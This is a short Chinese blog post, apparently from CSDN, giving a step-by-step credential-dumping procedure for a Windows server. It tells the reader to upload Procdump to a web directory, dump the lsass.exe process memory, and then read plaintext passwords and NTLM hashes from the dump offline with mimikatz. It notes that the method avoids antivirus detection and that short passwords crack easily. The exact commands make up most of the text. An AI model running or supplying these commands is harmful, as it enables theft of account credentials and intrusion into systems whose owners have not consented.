复现过程
导出lsass.exe
首先要获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到,这里用到微软官方发布的工具Procdump导出lsass.exe,所以不存在被杀软拦截的情况:
上传文件procdump64.exe到可执行目录中,执行下面语句:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
这是路径:C:\phpStudy\PHPTutorial\WWW\lsass.dmp。
这个时候我们可以将该文件down到本地来通过mimikatz读取密码,这里一定要注意下载的lsass.dmp文件一定要和mimikatz在同一个目录下
打开本地的mimikatz执行:
"sekurlsa::minidump lsass.dmp"
"sekurlsa::logonPasswords full"
就可以直接列出账号明文密码,还有NTLM的hash,hash可以拿去网站解密下,一般情况下六位以下密码还是很容易破解出来的。
来源:CSDN
作者:cj_hydra
链接:https://blog.csdn.net/cj_Allen/article/details/104107095